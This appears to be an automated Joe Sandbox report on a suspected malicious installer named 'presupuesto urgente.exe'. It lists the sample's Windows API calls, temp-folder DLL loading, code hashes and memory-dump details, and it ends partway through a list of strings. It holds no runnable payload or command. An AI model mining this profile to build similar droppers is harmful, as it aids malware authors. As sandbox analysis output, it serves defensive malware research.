                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                      • String ID: %u.%u%s%s$(7B
                                                                                                                                                      • API String ID: 3540041739-1320723960
                                                                                                                                                      • Opcode ID: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
                                                                                                                                                      • Instruction ID: 703546cccce40a16f7c4e0327b319c47dc4604cc2262111db7ea86f65ec4581c
                                                                                                                                                      • Opcode Fuzzy Hash: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
                                                                                                                                                      • Instruction Fuzzy Hash: 0911E7736041287BEB00556DAD46EAF329CDB85374F254237FA66F31D1DA79CC2182E8
                                                                                                                                                      APIs
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp$C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp\System.dll
                                                                                                                                                      • API String ID: 3109718747-3013484170
                                                                                                                                                      • Opcode ID: 04c8a0be0a3c8b5bca7af342d1437c7cd7f7eafe97cd42d6f17c4336303185e8
                                                                                                                                                      • Instruction ID: 778b7e41730bacb68cbd472b7e3a637cf80abcfea8faeb2db308f16ae4ae4a1c
                                                                                                                                                      • Opcode Fuzzy Hash: 04c8a0be0a3c8b5bca7af342d1437c7cd7f7eafe97cd42d6f17c4336303185e8
                                                                                                                                                      • Instruction Fuzzy Hash: 35112E72A00204BBDB146FB18F8D99F76649F55394F20443BF502F61C1DAFC48425B5E
                                                                                                                                                      APIs
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                                                                                                                        • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8114030407.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4216380887-0
                                                                                                                                                      • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                                                                                      • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                                                                                                                      • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                                                                                      • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                                                                                                                      APIs
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                                                      • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8114030407.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1148316912-0
                                                                                                                                                      • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                                      • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                                                      • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                                      • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1849352358-0
                                                                                                                                                      • Opcode ID: 1cce6cf5ba1aed4fa5ce4547bc0ae4b149cf4eb258e4777d2c59333f9832c14c
                                                                                                                                                      • Instruction ID: a606f7d5b7d9f25f85f3a996f6cf1d54ca927bfb9af82e5c1f6e8eb7e31f2730
                                                                                                                                                      • Opcode Fuzzy Hash: 1cce6cf5ba1aed4fa5ce4547bc0ae4b149cf4eb258e4777d2c59333f9832c14c
                                                                                                                                                      • Instruction Fuzzy Hash: 88F0FF72604518AFDB01DBE4DF88CEEB7BCEB08341B14047AF641F61A1CA749D518B78
                                                                                                                                                      APIs
                                                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                                      • String ID: !
                                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                                      • Opcode ID: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
                                                                                                                                                      • Instruction ID: 90968196233f782bf8ff3785c90d26ea0bd53ded382d002e8ee2e27c6658862d
                                                                                                                                                      • Opcode Fuzzy Hash: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
                                                                                                                                                      • Instruction Fuzzy Hash: 6121C171948209AEEF05EFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB28
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76893420,004036D5,?,00000006,00000008,0000000A), ref: 00405C87
                                                                                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76893420,004036D5,?,00000006,00000008,0000000A), ref: 00405C91
                                                                                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CA3
                                                                                                                                                      Strings
                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C81
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                      • API String ID: 2659869361-3355392842
                                                                                                                                                      • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                                                                                                      • Instruction ID: 792cc20aee96bfe2db1a273563d78520df22e3750eb0c1a77993888458b10d09
                                                                                                                                                      • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                                                                                                      • Instruction Fuzzy Hash: DBD0A731111631AAC1116B458D05CDF769C9F46315342143BF501B30A1C77C1D6187FD
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                                                                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,76892EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76892EE0,00000000), ref: 00405D3A
                                                                                                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
                                                                                                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57
                                                                                                                                                      • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,76892EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76892EE0,00000000), ref: 00405DE2
                                                                                                                                                      • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76892EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76892EE0), ref: 00405DF2
                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                      • String ID: 0_B
                                                                                                                                                      • API String ID: 3248276644-2128305573
                                                                                                                                                      • Opcode ID: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
                                                                                                                                                      • Instruction ID: 7d5bbe1e5c8c3abe72dbe24b1e5e7d34393fbb328f3a5d3c645332532cfc401b
                                                                                                                                                      • Opcode Fuzzy Hash: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
                                                                                                                                                      • Instruction Fuzzy Hash: 61F0D125114E6156E62232364D0DBAF1954CE8236474A853BFC51B22D1DB3C8953CDAE
                                                                                                                                                      APIs
                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 004053B7
                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405408
                                                                                                                                                        • Part of subcall function 00404391: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A3
                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                                                      • Opcode ID: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
                                                                                                                                                      • Instruction ID: e7a51b5005e981c4ca122d20ba3fe12824fd99f760bfe42b36e815d14bf77052
                                                                                                                                                      • Opcode Fuzzy Hash: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
                                                                                                                                                      • Instruction Fuzzy Hash: 5C01717120060DABDF209F11DD84AAB3735EB84395F204037FE457A1D1C7BA8D92AF69
                                                                                                                                                      APIs
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,004064F2,80000002), ref: 004062C4
                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,004064F2,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 004062CF
                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseQueryValue
                                                                                                                                                      • String ID: Call
                                                                                                                                                      • API String ID: 3356406503-1824292864
                                                                                                                                                      • Opcode ID: eb1f67c4e7283d14696156d079f1c46a9bcf05f485b6848abf2eef10094c0e69
                                                                                                                                                      • Instruction ID: c3e7de0656b9710826ab6423f517e97bb9b3954c36c3ca231a2eb326ebdf078d
                                                                                                                                                      • Opcode Fuzzy Hash: eb1f67c4e7283d14696156d079f1c46a9bcf05f485b6848abf2eef10094c0e69
                                                                                                                                                      • Instruction Fuzzy Hash: 80019A32500209EADF219F90CC09EDB3BA8EF55360F01803AFD16A21A0D738DA64DBA4
                                                                                                                                                      APIs
                                                                                                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76892EE0,00403A00,76893420,004037FF,00000006,?,00000006,00000008,0000000A), ref: 00403A43
                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00403A4A
                                                                                                                                                      Strings
                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A3B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Free$GlobalLibrary
                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                      • API String ID: 1100898210-3355392842
                                                                                                                                                      • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                                                                      • Instruction ID: 78aecf43d79df039942bc1d46619d1d902388d1bf991e2316d5006033f35a71e
                                                                                                                                                      • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                                                                      • Instruction Fuzzy Hash: D9E08C32A000205BC6229F45ED04B5E7B6C6F48B22F0A023AE8C07B26087745C82CF88
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\presupuesto urgente.exe,C:\Users\user\Desktop\presupuesto urgente.exe,80000000,00000003), ref: 00405CD3
                                                                                                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\presupuesto urgente.exe,C:\Users\user\Desktop\presupuesto urgente.exe,80000000,00000003), ref: 00405CE3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CharPrevlstrlen
                                                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                                                      • API String ID: 2709904686-3370423016
                                                                                                                                                      • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                                                                                                      • Instruction ID: 4c3d9e560c0c996ae094f7ef7b1b4ed865fc8cc67bffad09b41611580a74fc2a
                                                                                                                                                      • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                                                                                                      • Instruction Fuzzy Hash: 03D05EB2414A209AD3126704DD01D9F73A8EF12314746442AE841A6161E7785C918AAC
                                                                                                                                                      APIs
                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8114030407.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8113998987.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8114063244.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8114087670.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1780285237-0
                                                                                                                                                      • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                                      • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                                                      • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                                      • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E2F
                                                                                                                                                      • CharNextA.USER32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E40
                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 190613189-0
                                                                                                                                                      • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                                                      • Instruction ID: dc3323509655add47458b7bfdc28b409d7665b879035d0867add309d4545c2bc
                                                                                                                                                      • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                                                      • Instruction Fuzzy Hash: 89F06236104518EFC7029BA5DD40D9FBBA8EF06354B2540BAE980F7211D674DF01AB99

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:0%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                      Signature Coverage:100%
                                                                                                                                                      Total number of Nodes:1
                                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                                      execution_graph 48837 33572b90 LdrInitializeThunk

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 2 335734e0-335734ec LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 6bed7f82d961147cf2b7a3b57266751369deac43301b9811b2bfc56592187ed4
                                                                                                                                                      • Instruction ID: dee707304b1de71686abcd7552c50c805d06519e0b1b17d39dadd377ae2c997e
                                                                                                                                                      • Opcode Fuzzy Hash: 6bed7f82d961147cf2b7a3b57266751369deac43301b9811b2bfc56592187ed4
                                                                                                                                                      • Instruction Fuzzy Hash: BE90023170510842D50062585624706104587D0202F61CC16A0414928DC7A5895979A2

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 0 33572b90-33572b9c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 56cccc9ddbd96a2d058a3a26ad6d245d7fc35a42edbbbee690bad40f34ce3510
                                                                                                                                                      • Instruction ID: 17b984622b95800ebd4e8ff09f2b7c55c3b4fb921388ef4753e0e050e7a1bbba
                                                                                                                                                      • Opcode Fuzzy Hash: 56cccc9ddbd96a2d058a3a26ad6d245d7fc35a42edbbbee690bad40f34ce3510
                                                                                                                                                      • Instruction Fuzzy Hash: 9790023130108C42D5106258951474A004587D0302F55CC16A4414A18DC6A588997521

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1 33572d10-33572d1c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 59244f8a921e553bb4ad055e7a28d5676c213ed5916e919ce64d69f9ffe0a803
                                                                                                                                                      • Instruction ID: 55e9e9e8f54705f627f29d7fa82256df6fd74898c329cb1ab2cc93687f4b1df2
                                                                                                                                                      • Opcode Fuzzy Hash: 59244f8a921e553bb4ad055e7a28d5676c213ed5916e919ce64d69f9ffe0a803
                                                                                                                                                      • Instruction Fuzzy Hash: 8C90023130100853D51162585614707004987D0242F91CC17A0414918DD666895AB521

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $ $0
                                                                                                                                                      • API String ID: 3446177414-3352262554
                                                                                                                                                      • Opcode ID: 0f2fa418dca22cb7c3d532d1f706dbaf00047d039d5b202b3bf6d19b79dadead
                                                                                                                                                      • Instruction ID: c89b5c370bc83f300346bf489177525c870b65e4e09f2602a5f102367f61c07f
                                                                                                                                                      • Opcode Fuzzy Hash: 0f2fa418dca22cb7c3d532d1f706dbaf00047d039d5b202b3bf6d19b79dadead
                                                                                                                                                      • Instruction Fuzzy Hash: 123221B1A083819FE350CF68E884B5BBBE5BFC8744F44492EF59987250D774E909CB52

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      Strings
                                                                                                                                                      • Critical section address, xrefs: 335A5230, 335A52C7, 335A533F
                                                                                                                                                      • Thread identifier, xrefs: 335A5345
                                                                                                                                                      • Critical section address., xrefs: 335A530D
                                                                                                                                                      • corrupted critical section, xrefs: 335A52CD
                                                                                                                                                      • undeleted critical section in freed memory, xrefs: 335A5236
